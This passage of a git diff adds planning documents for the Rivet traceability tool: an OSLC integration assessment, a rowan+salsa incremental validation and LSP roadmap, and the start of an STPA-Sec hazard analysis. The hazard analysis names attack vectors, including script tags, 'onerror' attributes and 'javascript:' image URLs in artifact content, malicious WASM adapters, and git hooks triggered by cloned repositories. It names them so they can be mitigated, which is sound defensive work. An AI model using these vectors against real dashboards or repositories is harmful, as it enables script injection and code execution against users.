(Already Implemented) + +Rivet already has a working needs.json adapter (`rivet-core/src/formats/needs_json.rs`). 
+ +**Strengths**: +- Direct path to Eclipse SCORE adoption +- JSON format, lightweight, git-friendly +- Preserves sphinx-needs-specific metadata +- No server infrastructure required + +**Assessment**: This is the highest-priority integration for the SCORE adoption +play. Already implemented. + +### C. Direct REST Adapters Per Tool + +The approach OSLC was supposed to replace. Build specific adapters for +each tool's proprietary REST API. + +**Strengths**: +- Full access to tool-specific features +- Better documentation and community support +- More reliable authentication +- Can leverage tool-specific SDKs + +**Weaknesses**: +- N adapters for N tools (maintenance burden) +- API versioning and deprecation risk +- Each adapter is a significant effort + +**Assessment**: Pragmatic but not scalable. Should be considered only for +the 1-2 tools with the highest demand from actual users. + +### D. Git-Based Sync (Export/Import YAML) + +Rivet's native format is YAML in git. The simplest "sync" is: +1. Export YAML from Rivet +2. Commit to a shared git repo +3. Other tools import from the repo (via adapter) + +**Strengths**: +- Zero infrastructure +- Full Rivet fidelity (no lossy mapping) +- Git provides history, branching, merge +- Already how SCORE projects work + +**Assessment**: This is actually the dominant real-world pattern for +docs-as-code projects. It works when the "other tool" can import YAML/JSON. + +--- + +## 7. Strategic Assessment + +### The DD-001 Decision Should Be Revisited + +DD-001 ("OSLC over per-tool REST adapters") was based on the premise that +"Polarion, DOORS, and codebeamer already support [OSLC] natively" and that +"one adapter handles all tools." + +**This premise is only partly true**: + +1. Only DOORS Next has deep, native OSLC support. Polarion and codebeamer + have partial OSLC that is secondary to their proprietary REST APIs. + +2. OSLC's 4 resource types cannot represent ASPICE's 14-type V-model + without information loss. ReqIF can. + +3. 
OSLC authentication (Jazz OAuth, OIDC) is significantly more complex + than the Basic/Bearer auth currently implemented. A production OSLC + client for DOORS Next requires implementing Jazz form-based auth, + which involves multi-step HTTP redirects, cookie management, and + CSRF token handling. + +4. The OSLC ecosystem has low adoption: research indicates only ~20% of + the 25 most prevalent ALM tools have any OSLC capability. + +5. Eclipse SCORE (Rivet's strategic adoption target) does not use OSLC. + +### The Existing OSLC Code Is Not Wasted + +The OSLC module is well-architected and serves as a solid foundation: +- The `SyncAdapter` trait is useful regardless of protocol +- The mapping layer (`oslc_to_artifact`, `artifact_to_oslc`) demonstrates + the pattern for any adapter +- The `SyncDiff` computation is protocol-independent +- The test infrastructure (wiremock-based) is exemplary + +### Cost/Benefit Analysis + +| Investment | Benefit | Priority | +|---|---|---| +| Complete OSLC client (Jazz auth, TRS, RDF/XML, Config Mgmt) | Connect to DOORS Next | Low -- only ~10% of target users have DOORS Next | +| ReqIF import/export (already done) | Exchange with any major ALM tool | **Already shipped** | +| needs.json import (already done) | SCORE adoption | **Already shipped** | +| Polarion REST adapter | Direct Polarion sync | Medium -- if user demand materializes | +| codebeamer REST adapter | Direct codebeamer sync | Medium -- if user demand materializes | + +--- + +## 8. Recommendation + +### Near-Term (Phase 2-3): Keep OSLC as-is, invest elsewhere + +1. **Do not invest further in OSLC** until a concrete customer/user requires + DOORS Next integration. The existing OSLC module is a working prototype + that demonstrates the architecture. It is sufficient for the "we support + OSLC" checkbox. + +2. **Invest in ReqIF robustness** -- this is the universal interchange format + that every major tool supports. 
Ensure round-trip fidelity with DOORS, + Polarion, and codebeamer exports. Add attribute-type-to-ASPICE-type mapping. + +3. **Invest in needs.json quality** -- this is the SCORE adoption path. + Ensure that SCORE's 50+ need types import cleanly with full link preservation. + +4. **Ship the WASM adapter runtime (FEAT-012)** -- this allows users to write + their own tool-specific adapters without Rivet needing to maintain them. + A WASM adapter for Polarion's REST API or codebeamer's REST API can be + contributed by the community. + +### Medium-Term: Demote DD-001, promote adapter trait + +5. **Update DD-001 status** from `approved` to `superseded` with rationale: + "OSLC remains supported but is not the primary integration strategy. + ReqIF for interchange, needs.json for SCORE, and WASM adapters for + tool-specific REST APIs provide better coverage with less complexity." + +6. **Rename REQ-006 priority** from `should` to `could`. OSLC sync is + a nice-to-have, not a must-have, given the real-world tool landscape. + +### Long-Term: OSLC When Demanded + +7. If a customer requires DOORS Next integration: + - Implement Jazz form-based authentication + - Add TRS support for incremental sync + - Add RDF/XML content negotiation + - Add OSLC Configuration Management for baseline support + - This is a 4-6 week effort for a production-quality client + +8. If a customer requires Polarion or codebeamer integration: + - Build a direct REST adapter (not OSLC) + - Package it as a WASM component + - This is a 1-2 week effort per tool + +### Priority Order for Integration Work + +``` +1. needs.json import [done] -- SCORE adoption +2. ReqIF import/export [done] -- Universal interchange +3. WASM adapter runtime [planned] -- Extensibility +4. Polarion REST adapter [on demand] -- If users request +5. codebeamer REST adapter [on demand] -- If users request +6. 
OSLC + DOORS Next [on demand] -- If users request +``` + +--- + +## Sources + +### OSLC Specifications +- [OSLC Core 3.0 Overview](https://docs.oasis-open-projects.org/oslc-op/core/v3.0/oslc-core.html) +- [OSLC Specifications Index](https://open-services.net/specifications/) +- [OSLC TRS 3.0](https://docs.oasis-open-projects.org/oslc-op/trs/v3.0/tracked-resource-set.html) +- [OSLC Core 3.0 Changes](https://docs.oasis-open-projects.org/oslc-op/core-3.0-changes/v1.0/pn01/core-3.0-changes.html) + +### Tool OSLC Support +- [DOORS Next OSLC Services](https://www.ibm.com/docs/en/engineering-lifecycle-management-suite/doors-next/7.0.3?topic=function-extending-doors-next-by-using-oslc-services) +- [Polarion REST API](https://developer.siemens.com/polarion/rest-api-spec.html) +- [Polarion OSLC Services](https://docs.sodiuswillert.com/oslc-connect/latest/polarion-oslc-services-for-your-configuration) +- [Codebeamer OSLC Server Guide](https://support.ptc.com/help/codebeamer/r2.1/en/codebeamer/cb_dpt_integration/26334048.html) +- [Jama OSLC Adapter](https://github.com/OSLC/oslc-adapter-jama) + +### Authentication +- [Jazz Authentication Wiki](https://github.com/OSLC/oslc-client/wiki/JazzAuthentication) +- [Jazz OAuth discussion](https://jazz.net/forum/questions/268230/oslc-rootservices-with-oauth1-vs-oauth2) + +### Industry Analysis +- [OSLC Challenges (Jama Software)](https://www.jamasoftware.com/blog/oslc-what-is-it-and-what-are-its-challenges/) +- [OSLC as ALM Integration Standard](https://mgtechsoft.com/blog/what-is-open-services-lifecycle-collaboration/) +- [ReqIF vs OSLC comparison](https://www.se-trends.de/en/reqif-and-systems-engineering/) +- [ReqIF overview (Visure)](https://visuresolutions.com/alm-guide/reqif/) + +### Eclipse SCORE +- [S-CORE Documentation](https://eclipse-score.github.io/score/main/) +- [Eclipse S-CORE GitHub](https://github.com/eclipse-score) +- [Sphinx-Needs](https://www.sphinx-needs.com/) +- [Open-Needs](https://open-needs.org/) diff --git 
a/docs/plans/2026-03-16-rowan-salsa-completion.md b/docs/plans/2026-03-16-rowan-salsa-completion.md new file mode 100644 index 0000000..c0817fa --- /dev/null +++ b/docs/plans/2026-03-16-rowan-salsa-completion.md @@ -0,0 +1,393 @@ +# rowan + salsa Incremental Validation: Completion Plan + +**Issue:** [#22 — rowan + salsa incremental validation architecture](https://github.com/pulseengine/rivet/issues/22) +**Date:** 2026-03-16 +**Artifacts:** REQ-028, REQ-029, DD-023, DD-024, FEAT-046, FEAT-047, FEAT-048 + +--- + +## 1. Current State Assessment + +### 1.1 What Works Today + +**Layer 1 — rowan CST (MODULE.bazel only):** +- `rivet-core/src/bazel.rs` — Complete rowan-based parser for MODULE.bazel Starlark subset +- ~20 `SyntaxKind` variants (tokens + composite nodes + error recovery) +- Hand-written lexer + recursive-descent parser emitting `GreenNode` +- HIR extraction (`BazelModule`) from CST: `module()`, `bazel_dep()`, overrides +- Error recovery — `load()`, variable assignment, dotted expressions wrapped as `Error` nodes +- 10 tests covering lexer, CST, HIR, error recovery, and realistic input + +**Layer 2 — salsa incremental database:** +- `rivet-core/src/db.rs` — Complete salsa 0.26 database with: + - **Inputs:** `SourceFile` (path + content), `SchemaInput` (name + content), set containers for both + - **Tracked queries:** `parse_artifacts(file)`, `validate_all(sources, schemas)`, `evaluate_conditional_rules(sources, schemas)` + - **Helper functions (non-tracked):** `build_pipeline`, `build_store`, `build_schema` + - **Concrete database:** `RivetDatabase` with `load_schemas()`, `load_sources()`, `update_source()`, `store()`, `schema()`, `diagnostics()`, `conditional_diagnostics()` +- CLI integration: `rivet validate --incremental` and `--verify-incremental` flags +- Verification mode: SC-11 parity check comparing incremental vs sequential pipelines +- 16 database tests covering: empty DB, unlinked/linked artifacts, incremental updates, determinism, add/remove 
artifacts, conditional rules, rule composition, consistency checks + +**Layer 3 — Supporting infrastructure:** +- `yaml_edit.rs` — Indentation-aware YAML editor (lossless roundtrip for mutations) +- `impact.rs` — Change impact analysis via BFS on link graph +- `validate.rs` — 8-phase validation: `validate_structural()` (phases 1-7) + conditional rules (phase 8) +- `store.rs` — In-memory artifact store with type indexing +- `links.rs` — petgraph-based link graph with forward/backward/broken links + +### 1.2 What Does NOT Work Yet + +1. **CLI does not default to incremental** — `--incremental` is opt-in, sequential pipeline is default +2. **Only `generic-yaml` format supported in salsa path** — STPA, AADL, ReqIF, needs-json formats are skipped +3. **No rowan CST for artifact/schema YAML files** — parsing goes through serde_yaml, no span information +4. **No source location on diagnostics** — `Diagnostic` struct has no file path, line, or column +5. **Store and LinkGraph lack `PartialEq`** — cannot be salsa tracked return types (noted in db.rs comments) +6. **`build_store` and `build_schema` are non-tracked** — pipeline runs twice in `validate_all` + `evaluate_conditional_rules` +7. **No file watching** — incremental database is created fresh each invocation, no warm-cache reuse +8. **No LSP server** — no `tower-lsp` or `lsp-server` integration +9. **No per-file artifact granularity in salsa** — `parse_artifacts` returns `Vec<Artifact>`, not individually tracked artifacts +10. **Impact analysis does not use salsa** — `impact.rs` uses separate diff-based approach + +--- + +## 2. 
Architecture: LSP-Ready State + +### 2.1 Target Query Graph + +``` + ┌─────────────────┐ + │ File Watcher │ (notify crate) + │ or LSP client │ + └────────┬────────┘ + │ set_content(path, text) + ▼ +┌────────────────────────────────────────────────────────────┐ +│ RivetDatabase │ +│ │ +│ ┌──────────────┐ ┌──────────────┐ │ +│ │ SourceFile │ │ SchemaInput │ salsa::input │ +│ │ path+content │ │ name+content │ │ +│ └──────┬───────┘ └──────┬───────┘ │ +│ │ │ │ +│ ▼ ▼ │ +│ ┌──────────────┐ ┌──────────────┐ │ +│ │parse_artifact│ │ parse_schema │ salsa::tracked │ +│ │ s(file) │ │ (file) │ (per-file) │ +│ └──────┬───────┘ └──────┬───────┘ │ +│ │ │ │ +│ ▼ ▼ │ +│ ┌──────────────┐ ┌──────────────┐ │ +│ │ ArtifactSet │ │MergedSchema │ salsa::tracked │ +│ │ (all files) │ │ (all schemas)│ (aggregates) │ +│ └──────┬───────┘ └──────┬───────┘ │ +│ │ │ │ +│ └───────┬───────────┘ │ +│ ▼ │ +│ ┌─────────────┐ │ +│ │ LinkGraph │ salsa::tracked │ +│ │(+broken refs)│ │ +│ └──────┬──────┘ │ +│ │ │ +│ ┌────────┼────────┐ │ +│ ▼ ▼ ▼ │ +│ ┌──────────┐ ┌─────┐ ┌──────────────┐ │ +│ │structural│ │trace│ │ conditional │ salsa::tracked │ +│ │validation│ │rules│ │ rules │ (per-category) │ +│ └────┬─────┘ └──┬──┘ └──────┬───────┘ │ +│ │ │ │ │ +│ └──────────┼───────────┘ │ +│ ▼ │ +│ ┌──────────────┐ │ +│ │ all_diagnost │ salsa::tracked │ +│ │ ics() │ (top-level) │ +│ └──────┬───────┘ │ +│ │ │ +│ ▼ │ +│ ┌──────────────┐ │ +│ │ Diagnostic │ With file path, │ +│ │ + SourceLoc │ line:col spans │ +│ └──────────────┘ │ +└────────────────────────────────────────────────────────────┘ + │ + ▼ + ┌─────────────────────────┐ + │ LSP / CLI / Dashboard │ + │ textDocument/ │ + │ publishDiagnostics │ + └─────────────────────────┘ +``` + +### 2.2 Key Architectural Properties + +- **Single database instance** shared across CLI (watch mode), dashboard (serve), and LSP +- **File-level granularity** for invalidation: changing one YAML file re-parses only that file +- **Per-category validation** tracked separately: 
structural, traceability, conditional rules +- **Diagnostic spans** traceable to source locations via rowan TextRange or line:col pairs +- **Same DB serves all consumers**: `rivet validate`, `rivet serve`, `rivet lsp` + +--- + +## 3. Remaining Work Items + +### Phase A: Make Incremental the Default (no rowan required) + +**A1. Derive `PartialEq` for Store and LinkGraph** (~1 day) +- Add `#[derive(PartialEq)]` to `Store`, `LinkGraph`, and all transitive types +- For `LinkGraph`: need `PartialEq` on `ResolvedLink`, `Backlink` (already `Clone + Debug`) +- petgraph `DiGraph` does not implement `PartialEq`; either skip the graph field from comparison or store it separately +- This unblocks making `build_store` and `build_schema` into salsa tracked functions, eliminating the duplicate pipeline execution noted in db.rs + +**A2. Lift `build_store` and `build_schema` to tracked functions** (~0.5 day) +- Currently non-tracked helpers called from both `validate_all` and `evaluate_conditional_rules` +- With PartialEq on return types, these become `#[salsa::tracked]` functions +- Eliminates redundant store/schema assembly on every validation call + +**A3. Add all adapter formats to the salsa path** (~2 days) +- Currently `cmd_validate_incremental` skips sources with format != "generic" / "generic-yaml" +- Need to route STPA, AADL, ReqIF, needs-json through the salsa database +- Strategy: add a `parse_artifacts_with_adapter(db, source, format)` tracked function that dispatches to the correct adapter +- Each adapter's parse result (Vec<Artifact>) is cached per file + +**A4. Source location on Diagnostic** (~1 day) +- Add `source_file: Option<String>` and `source_line: Option<usize>` to `Diagnostic` +- Populate from `Artifact::source_file` (already tracked) and serde_yaml error positions +- No rowan needed — serde_yaml provides line numbers for parse errors; artifact `source_file` provides file paths +- Validate pipeline propagates source_file through to diagnostics + +**A5. 
Remove `--incremental` flag, make salsa the default** (~0.5 day) +- Keep `--verify-incremental` as a safety check for transition period +- Add `--no-incremental` escape hatch (legacy sequential mode) +- Update CLI tests to use the salsa path +- Gate behind a transition period: `--incremental` prints deprecation notice + +**A6. File-watching warm-cache mode for CLI** (~2 days) +- Add `rivet validate --watch` using the `notify` crate +- Holds `RivetDatabase` in memory between file changes +- On file change: `db.update_source(path, new_content)` then `db.diagnostics()` +- Demonstrates the core incremental value: sub-ms revalidation on warm cache +- This is the simplest proof of salsa's value proposition + +**A7. Integrate salsa into `rivet serve` dashboard** (~2 days) +- Dashboard currently reloads all artifacts on each request +- Share `RivetDatabase` behind an `Arc<RwLock<_>>` in the axum state +- File watcher updates the database; handlers read cached results +- Validation page, stats, graph all query the same warm database + +### Phase B: rowan CST for Artifact YAML Files + +**B1. Design YAML CST SyntaxKind enum** (~1 day) +- Define `YamlSyntaxKind` covering the subset Rivet uses: + - `Root`, `Document`, `MappingEntry`, `SequenceEntry`, `BlockMapping`, `FlowSequence` + - `Key`, `Colon`, `Value`, `Dash`, `Indent`, `Comment`, `Newline`, `ScalarValue`, `StringLit` + - `ArtifactsBlock`, `ArtifactEntry` (higher-level composite nodes) + - `Error` for recovery +- Define `YamlLanguage` implementing `rowan::Language` + +**B2. YAML lexer** (~2 days) +- Indentation-sensitive tokenizer for the artifact YAML subset +- Must handle: block scalars (`>`, `|`), flow sequences (`[...]`), quoted strings, comments +- Produce tokens with exact byte positions for span tracking +- This is more complex than the MODULE.bazel lexer due to indentation significance + +**B3. 
YAML recursive-descent parser** (~3 days) +- Build `GreenNode` CST from token stream +- Error recovery: partial parse on malformed YAML still produces usable CST +- Must produce `ArtifactEntry` nodes for each `- id:` block +- Span information on every node enables diagnostic-quality error reporting + +**B4. Replace serde_yaml parsing with rowan CST path** (~2 days) +- `parse_generic_yaml()` currently uses serde_yaml +- New path: lex -> parse -> CST -> HIR extraction (Artifact structs) +- HIR extraction walks the CST to produce the same `Vec<Artifact>` output +- serde_yaml path kept as fallback; feature flag or runtime switch + +**B5. Schema file rowan CST** (~2 days) +- Separate `SchemaSyntaxKind` or reuse `YamlSyntaxKind` for schema YAML +- Schema files have a known structure; CST enables better error messages for malformed schemas +- Lower priority than artifact CST — schemas change infrequently + +**B6. Wire rowan spans into Diagnostic** (~1 day) +- `Diagnostic` gains `text_range: Option<rowan::TextRange>` field +- Validation functions that detect errors from CST-parsed artifacts attach the span +- Conversion to line:col via a line index computed from source text + +### Phase C: LSP Server + +**C1. Add `tower-lsp` dependency and server skeleton** (~1 day) +- New crate `rivet-lsp` or module in `rivet-cli` +- Implement `LanguageServer` trait with stub handlers +- `rivet lsp` subcommand starts the server on stdin/stdout + +**C2. `textDocument/didOpen` and `textDocument/didChange`** (~1 day) +- On open: load file content into `RivetDatabase` via `SourceFile::new()` +- On change: `db.update_source(path, new_content)` +- Trigger revalidation, publish diagnostics + +**C3. `textDocument/publishDiagnostics`** (~1 day) +- Convert `Diagnostic` (with source location) to LSP `Diagnostic` +- Map `Severity::Error` -> `DiagnosticSeverity::Error`, etc. +- Publish to client after each revalidation + +**C4. 
`textDocument/completion`** (~2 days) +- Artifact ID completion in `links:` target fields +- Artifact type completion in `type:` fields +- Link type completion in `links:` type fields +- Schema-aware: only suggest valid target types for a given link type + +**C5. `textDocument/hover`** (~1 day) +- Hover over artifact ID in `links:` shows target artifact summary +- Hover over link type shows schema description +- Hover over artifact type shows type definition + +**C6. `textDocument/definition`** (~1 day) +- Go-to-definition on artifact IDs in link targets +- Jump to the `- id:` line in the target artifact's source file +- Requires `source_file` to be populated on all artifacts + +**C7. VS Code extension packaging** (~2 days) +- Extension activates for `*.yaml` files in projects with `rivet.yaml` +- Ships `rivet` binary, starts `rivet lsp` +- Configuration: schema path, project root +- This is the commercial value play for Eclipse SCORE adoption + +### Phase D: Advanced Incremental Features + +**D1. Per-artifact salsa tracking** (~2 days) +- Currently `parse_artifacts()` returns `Vec<Artifact>` — the entire file +- Add `#[salsa::tracked]` struct `TrackedArtifact` wrapping individual artifacts +- `parse_artifacts()` returns `Vec<TrackedArtifact>` +- Changing one artifact in a multi-artifact file only invalidates that artifact's downstream queries +- Requires careful design: tracked structs need stable identity across re-parses + +**D2. Salsa-powered impact analysis** (~1 day) +- Replace `impact.rs` BFS approach with salsa query invalidation +- "What is impacted by changing file X?" = "What salsa queries would re-execute?" +- salsa does not currently expose its dependency graph externally; may need to track this manually +- Alternative: keep BFS impact but feed it from the salsa-cached link graph + +**D3. 
Cross-repo incremental validation** (~3 days) +- `externals.rs` already supports cross-repo artifact linking +- External artifacts become `SourceFile` inputs with a "repo:path" key +- File watching spans multiple repo directories +- Invalidation boundary: external changes re-trigger local link validation but not external schema validation + +**D4. Document validation in salsa** (~1 day) +- `validate_documents()` checks `[[ID]]` references in markdown documents +- Add `DocumentInput` salsa input and `validate_document_refs()` tracked function +- Document changes only revalidate affected document references + +--- + +## 4. Migration Strategy + +### Principle: No Breaking Changes + +Every phase is additive. The sequential pipeline (`validate()` in validate.rs) remains functional throughout. The salsa path produces identical results (verified by SC-11). + +### Phase Ordering and Dependencies + +``` +Phase A (Foundation) Phase B (rowan YAML) Phase C (LSP) +━━━━━━━━━━━━━━━━━━━ ━━━━━━━━━━━━━━━━━━ ━━━━━━━━━━━━ +A1 PartialEq ──┐ B1 SyntaxKind enum C1 server skeleton +A2 tracked fn ─┤ B2 YAML lexer ──┐ C2 didOpen/didChange +A3 all adapters│ B3 YAML parser ─┤ C3 publishDiagnostics +A4 source locs ┤ B4 replace serde┤ C4 completion +A5 default ────┤ B5 schema CST │ C5 hover +A6 --watch ────┤ B6 spans ────────┘ C6 definition +A7 serve ──────┘ C7 VS Code ext + +A must complete ──→ B can start (B needs stable salsa infra) +A must complete ──→ C can start (C needs source locations) +B6 feeds ─────────→ C3 (spans make LSP diagnostics precise) +``` + +### Transition Timeline + +| Milestone | Items | Key Deliverable | +|-----------|-------|----------------| +| **v0.2.0** | A1-A5 | Incremental is default; all adapters supported | +| **v0.3.0** | A6-A7, B1-B3 | Watch mode, dashboard integration, YAML CST prototype | +| **v0.4.0** | B4-B6, C1-C3 | rowan-parsed artifacts, basic LSP with diagnostics | +| **v0.5.0** | C4-C7, D1-D2 | Full LSP, VS Code extension, per-artifact tracking | +| 
**v1.0.0** | D3-D4 | Cross-repo incremental, document validation | + +--- + +## 5. New Artifacts Needed + +### Requirements + +| ID | Title | Rationale | +|----|-------|-----------| +| REQ-033 | Source location tracking on validation diagnostics | Diagnostics without file:line are unusable for LSP and large projects | +| REQ-034 | File-watching incremental validation mode | Core value proposition of salsa — sub-ms revalidation on file change | +| REQ-035 | YAML lossless CST with rowan | Enables error recovery, span-based diagnostics, and LSP features | +| REQ-036 | Language Server Protocol support for artifact YAML | IDE integration for SCORE adoption; commercial VS Code extension play | + +### Design Decisions + +| ID | Title | Rationale | +|----|-------|-----------| +| DD-031 | YAML CST SyntaxKind design for artifact/schema files | The YAML subset used by Rivet is small enough for a hand-written parser but needs indentation sensitivity | +| DD-032 | tower-lsp over lsp-server for Rivet LSP | tower-lsp is async and composable with axum; lsp-server is sync. 
spar could go either way but Rivet already has tokio | +| DD-033 | notify crate for file watching in CLI and dashboard | Cross-platform file watching; same approach as rust-analyzer | + +### Features + +| ID | Title | Links | +|----|-------|-------| +| FEAT-053 | Source locations on all validation diagnostics | satisfies REQ-033 | +| FEAT-054 | `rivet validate --watch` with warm salsa cache | satisfies REQ-034, implements DD-024 | +| FEAT-055 | YAML rowan CST parser for artifact files | satisfies REQ-035, implements DD-031 | +| FEAT-056 | `rivet lsp` Language Server Protocol implementation | satisfies REQ-036, implements DD-032 | +| FEAT-057 | VS Code extension for Rivet artifact YAML | satisfies REQ-036 | +| FEAT-058 | salsa integration in `rivet serve` dashboard | satisfies REQ-029, implements DD-024 | + +### STPA Artifacts (extend existing) + +The following existing STPA artifacts already cover incremental validation safety: +- **H-9:** Incremental validation returns stale results (hazard) +- **SC-11:** Incremental must equal full validation (safety constraint) +- **UCA-C-10..C-14:** Incremental validation UCAs +- **CC-C-10..C-14:** Causal chain for incremental errors + +New loss scenario needed: +- **LS-NEW:** LSP server publishes stale diagnostics after rapid file edits due to race between file watcher and salsa query execution + +--- + +## 6. 
Risks and Mitigations + +| Risk | Impact | Mitigation | +|------|--------|------------| +| YAML indentation parsing is hard to get right | B2-B3 take longer than estimated | Start with a minimal subset (artifact files only), reuse yaml_edit.rs knowledge | +| salsa 0.26 API instability | API changes break db.rs | Pin to exact version; salsa 0.26 is stable (used by spar, rust-analyzer uses fork) | +| PartialEq on petgraph DiGraph | A1 blocked — DiGraph has no PartialEq | Store the graph behind an opaque wrapper; compare by node/edge counts or skip graph from PartialEq | +| Per-artifact tracking identity issues | D1 correctness — re-parse changes artifact identity | Use artifact ID as the salsa identity key; handle ID renames as remove+add | +| LSP adoption requires VS Code extension | C7 is cross-ecosystem work (TypeScript) | Start with a minimal extension; existing YAML LSP extensions can be adapted | + +--- + +## 7. Success Criteria + +1. **`rivet validate` defaults to incremental** — no `--incremental` flag needed +2. **SC-11 always passes** — `--verify-incremental` confirms parity on every CI run +3. **`rivet validate --watch`** shows sub-10ms revalidation on file change (warm cache) +4. **`rivet serve` dashboard** uses shared salsa database — no full reload per request +5. **`rivet lsp`** publishes diagnostics with file:line:col accuracy +6. **VS Code extension** provides completion, hover, and go-to-definition for artifact YAML +7. **All adapter formats** (generic, stpa, aadl, reqif, needs-json) route through salsa + +--- + +## 8. Relation to Phase 3 Workstreams + +This plan is workstream 7 ("rowan + salsa incremental validation") from the +[Phase 3 parallel workstreams design](2026-03-14-phase3-parallel-workstreams-design.md). 
+ +It intersects with: +- **Workstream 3** (CLI mutation safety) — mutations should invalidate the salsa cache +- **Workstream 4** (dashboard) — shared salsa database for serve +- **Workstream 6** (cross-repo) — external artifacts as salsa inputs +- **Workstream 8** (SCORE adoption) — LSP/VS Code extension is a key selling point diff --git a/docs/plans/2026-03-16-stpa-sec-analysis.md b/docs/plans/2026-03-16-stpa-sec-analysis.md new file mode 100644 index 0000000..c9da12d --- /dev/null +++ b/docs/plans/2026-03-16-stpa-sec-analysis.md @@ -0,0 +1,867 @@ +# STPA and STPA-Sec Fresh Analysis Report + +**Date:** 2026-03-16 +**Scope:** Full Rivet codebase at current state (branch `feat/compound-layout`) +**Method:** Fresh STPA (Steps 1-4) + STPA-Sec extension + OSLC lifecycle lens + +--- + +## Executive Summary + +This report presents a fresh STPA analysis performed against the current Rivet codebase, comparing findings against the existing STPA artifacts in `safety/stpa/`. The analysis identified: + +- **0 new losses** needed (existing 6 losses remain complete) +- **5 new hazards** (H-13 through H-17) for components added since the last analysis +- **5 new system constraints** (SC-15 through SC-19) +- **3 new controllers** added to the control structure (CTRL-EXPORT, CTRL-YAML-EDIT, CTRL-SALSA) +- **15 new UCAs** across export, document rendering, commit traceability, and WASM runtime +- **14 loss scenarios** needed (8 for existing UCAs lacking them + 6 for new UCAs) +- **6 STPA-Sec findings** with missing mitigations +- **3 OSLC lifecycle gaps** + +--- + +## Part 1: Fresh STPA Analysis + +### Step 1: Loss Completeness Review + +The existing 6 losses were evaluated against all new capabilities: + +| Loss | Title | Still Complete? | Notes | +|------|-------|-----------------|-------| +| L-1 | Loss of traceability integrity | Yes | Export, markdown rendering, and document validation all create derivative representations of traceability data. 
HTML export integrity falls under L-1 (incorrect traceability data in reports) and L-2 (compliance evidence). | +| L-2 | Loss of compliance evidence | Yes | HTML exports used as audit evidence are covered: an incorrect export is misleading compliance evidence. | +| L-3 | Loss of data sovereignty | Yes | YAML mutation and cross-repo sync are data sovereignty concerns. | +| L-4 | Loss of engineering productivity | Yes | Salsa cache staleness and build-system misparsing waste engineering time. | +| L-5 | Loss of safety assurance | Yes | All new hazards eventually chain to L-5 through traceability gaps. | +| L-6 | Loss of audit trail | Yes | YAML mutation without attribution is an audit trail concern. | + +**Verdict: No new losses needed.** The existing 6 losses adequately cover all new capabilities. The requested losses for "export integrity," "incremental validation correctness," and "formal proof validity" are already subsumed by L-1, L-2, and L-5 respectively. + +### Step 2: New Hazards + +The following hazards were identified for code added since the last STPA analysis. Note: the user requested IDs H-13+ but some of the proposed hazards (XSS via markdown, salsa staleness, build-system misparsing) overlap with existing hazards. Where overlap exists, I note the existing hazard and add only genuinely new hazards. 
+ +**Already covered by existing hazards:** + +- "salsa cache returns stale results after schema change" -- **H-9** and sub-hazards H-9.1, H-9.2 +- "build-system provider misidentifies dependency versions" -- **H-11** and sub-hazards H-11.1, H-11.2 +- "impact analysis misses transitively affected artifacts" -- subsumable under **H-1** (stale cross-references) and **H-3** (incorrect coverage metrics) + +**New hazards:** + +```yaml +# Proposed additions to safety/stpa/hazards.yaml + + - id: H-13 + title: Rivet document renderer produces HTML containing unescaped artifact content + description: > + The markdown-to-HTML renderer in document.rs processes artifact + descriptions, titles, and field values into HTML output for the + dashboard and document views. If artifact content contains HTML + entities, script tags, or event handler attributes that are not + properly escaped, the rendered output enables cross-site scripting + (XSS) in the dashboard. In a worst-case environment where the + dashboard is used during an audit review or shared via screen + recording, injected scripts could alter displayed traceability + data, exfiltrate session information, or modify the visual + presentation of compliance metrics. + losses: [L-1, L-2, L-3] + + - id: H-14 + title: Rivet WASM adapter executes untrusted code that corrupts import results + description: > + The WASM runtime (wasm_runtime.rs) loads and executes third-party + adapter components. A compromised or buggy WASM adapter could + return fabricated artifacts, modify link targets, inject additional + artifacts, or silently drop artifacts during import. The host trusts + the adapter's output without independent verification against the + source data. In a worst-case environment where adapters are + distributed as binary components without source review, a supply + chain attack could introduce falsified traceability data. 
+ losses: [L-1, L-3, L-5] + + - id: H-15 + title: Rivet commit traceability analysis produces false coverage from misidentified artifact references + description: > + The commit analysis engine (commits.rs) extracts artifact IDs from + git trailer values using pattern matching (PREFIX-DIGITS). False + positives occur when non-artifact strings match this pattern (e.g., + "ISO-26262" parsed as artifact ID "ISO-26262", or "SHA-256" parsed + as "SHA-256"). False negatives occur when artifact IDs use + non-standard formats (e.g., "H-1.2", "UCA-C-10") that the regex + does not match. Both inflate or deflate commit-artifact coverage + metrics, misrepresenting implementation completeness. + losses: [L-1, L-2] + + - id: H-16 + title: Rivet dashboard serves stale data after hot-reload fails silently + description: > + The dashboard server (serve.rs) provides a reload endpoint that + re-reads all artifact files, schemas, and documents from disk. If + the reload encounters a parse error in one YAML file, it may fail + and leave the in-memory state unchanged without notifying the user. + The dashboard continues serving the pre-reload state while the + user believes they are viewing current data. In a worst-case + environment where an engineer has just fixed a validation error + and reloaded, they see the old (passing) state and conclude + their fix is working when it actually introduced a new error. + losses: [L-1, L-3, L-4] + + - id: H-17 + title: Rivet cross-repo sync clones arbitrary git repositories specified in rivet.yaml + description: > + The externals module (externals.rs) executes `git clone` and + `git fetch` commands against URLs specified in the project's + rivet.yaml configuration. A malicious or compromised rivet.yaml + could specify a git URL pointing to a hostile repository. The + clone/fetch operation may trigger git hooks, download large + volumes of data, or overwrite local state in the cache directory. 
+ In a worst-case environment where rivet.yaml is modified in a + supply chain attack, the sync command becomes a vector for + arbitrary code execution via git hooks. + losses: [L-3, L-5] +``` + +**Sub-hazards for H-13:** + +```yaml +sub-hazards: + - id: H-13.1 + parent: H-13 + title: Rivet dashboard renders artifact descriptions containing script injection + description: > + An artifact's description field contains `<script>` tags or + `onerror` attributes. The dashboard's HTML rendering pipeline + includes the content without sanitization in the artifact detail + view, enabling script execution in the viewer's browser. + + - id: H-13.2 + parent: H-13 + title: Rivet document renderer passes markdown image URLs without validation + description: > + A markdown document references an image with a `javascript:` or + `data:` URL scheme. The parse_markdown_link function in document.rs + only allows http/https/# URLs, but the img tag rendering path may + not apply the same restriction, enabling script injection via + crafted image sources. +``` + +### Step 3: New System Constraints + +```yaml +# Proposed additions to safety/stpa/system-constraints.yaml + + - id: SC-15 + title: Rivet must HTML-escape all artifact content before rendering in dashboard or document views + description: > + Every artifact field value (title, description, custom fields) and + document body content must be HTML-escaped before insertion into + HTML output. Script tags, event handlers, and other HTML injection + vectors must be neutralized. The escaping must occur at the output + boundary (rendering), not at the input boundary (parsing), to + ensure defense-in-depth. 
